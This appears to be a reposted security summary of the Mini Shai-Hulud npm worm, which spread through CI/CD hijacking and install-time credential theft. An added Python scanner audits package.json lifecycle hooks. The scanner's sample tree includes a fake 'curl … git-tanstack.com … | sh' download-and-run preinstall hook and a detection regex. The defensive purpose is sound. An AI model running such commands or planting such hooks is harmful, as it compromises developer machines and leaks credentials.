(guardz.com) Mini Shai-Hulud: Self-Propagating Worm Compromises npm Ecosystem via CI/CD Pipeline Hijacking
-
The Mini Shai-Hulud worm (attributed to TeamPCP) compromised 200+ npm packages via CI/CD hijacking, hitting TanStack, Mistral AI, and others. The payload executed at install time, bypassing SLSA provenance, and harvested credentials from developer workstations and cloud environments. A destructive routine was wired to fire if the stolen tokens were revoked.
In brief - A self-propagating npm worm attributed to TeamPCP leveraged stolen tokens and GitHub Actions abuse to compromise 200+ packages, exfiltrating credentials via dead-drops and threatening system wipes. Critical gaps in SLSA provenance and package signing enabled the attack.
Technically - Mini Shai-Hulud abused `pull_request_target` workflows, cache poisoning, and OIDC token extraction to inject a malicious `router_init.js` loader that runs at install time. The 2.x MB obfuscated JavaScript targeted 100+ credential paths (GitHub/npm tokens, cloud credentials, Kubernetes configs) across macOS, Linux, and Windows. Exfiltration used the Session Protocol, GitHub GraphQL dead-drops, and a typosquatted domain (`git-tanstack.com`). Persistence was via systemd units/LaunchAgents and IDE hooks, with destructive triggers tied to token revocation. Propagation scaled by infecting every package owned by each compromised maintainer.
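Because the payload runs from an install-time lifecycle script, the quickest check a practitioner can run on a checkout or `node_modules` tree is to enumerate every `preinstall`/`install`/`postinstall`/`prepare` hook and flag the indicators named above. The script below is an added example and is not code from the post or from any of the affected projects; the package names in the sample tree are hypothetical, the `router_init.js` and `git-tanstack.com` strings come from the write-up, and the generic download-and-run patterns are this example's own assumption, not something the post attributes to the worm.

```python
"""Scan package.json manifests for install-time lifecycle scripts that can run
arbitrary code during `npm install`, and flag the indicators from the write-up."""
import json
import re
import tempfile
from pathlib import Path

# npm runs these scripts automatically during install (prepare on a local
# install); whatever they run executes with the developer's or CI runner's
# credentials within reach.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Indicators from the write-up (router_init.js loader, git-tanstack.com typosquat)
# plus generic "download-and-run" patterns. The generic ones are an assumption of
# this example, not behaviour the write-up attributes to the worm.
INDICATORS = re.compile(
    r"router_init\.js|git-tanstack\.com|\bcurl\b|\bwget\b|base64|node\s+-e\b|\beval\(",
    re.IGNORECASE,
)


def audit_manifest(manifest: dict, origin: str = "<inline>") -> list[dict]:
    """Return one finding per install hook, noting which indicator (if any) matched."""
    findings = []
    scripts = manifest.get("scripts") or {}
    if not isinstance(scripts, dict):
        return findings
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        match = INDICATORS.search(cmd)
        findings.append({
            "package": manifest.get("name", "?"),
            "version": manifest.get("version", "?"),
            "hook": hook,
            "command": cmd,
            "indicator": match.group(0) if match else None,
            "origin": origin,
        })
    return findings


def audit_tree(root: Path) -> list[dict]:
    """Walk a checkout or node_modules tree and audit every package.json in it."""
    findings = []
    for manifest_path in sorted(root.rglob("package.json")):
        try:
            manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or not JSON: skip it rather than abort the scan
        if isinstance(manifest, dict):
            findings.extend(audit_manifest(manifest, str(manifest_path.relative_to(root))))
    return findings


# Constructed sample tree (hypothetical package names): one benign package with
# build-only scripts, one mimicking the install-time loader from the write-up,
# and one with a generic download-and-run preinstall hook.
SAMPLE_TREE = {
    "node_modules/good-lib/package.json": {
        "name": "good-lib", "version": "1.0.0",
        "scripts": {"build": "tsc -p .", "test": "vitest run"},
    },
    "node_modules/poisoned-lib/package.json": {
        "name": "poisoned-lib", "version": "4.2.1",
        "scripts": {"postinstall": "node router_init.js", "build": "tsc -p ."},
    },
    "node_modules/stager/package.json": {
        "name": "stager", "version": "0.0.9",
        "scripts": {"preinstall": "curl -s https://git-tanstack.com/x | sh"},
    },
}


def build_sample_tree() -> Path:
    """Write the constructed manifests into a temporary directory and return its root."""
    root = Path(tempfile.mkdtemp(prefix="npm-audit-"))
    for rel, manifest in SAMPLE_TREE.items():
        path = root / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(json.dumps(manifest), encoding="utf-8")
    return root


def run_sample() -> list[dict]:
    """Audit the constructed tree and return only the hooks that hit an indicator."""
    return [f for f in audit_tree(build_sample_tree()) if f["indicator"]]


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f['origin']}: {f['package']}@{f['version']} {f['hook']} -> "
              f"{f['command']!r} (matched {f['indicator']})")
```

Point `audit_tree` at a real checkout to review every install hook, not only the ones that match a pattern: any lifecycle script that fetches or evaluates code deserves a look, and `npm install --ignore-scripts` (or the equivalent `ignore-scripts=true` in `.npmrc`) removes this execution path entirely for CI runners that do not need native builds.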
-
relay@relay.infosec.exchange shared this topic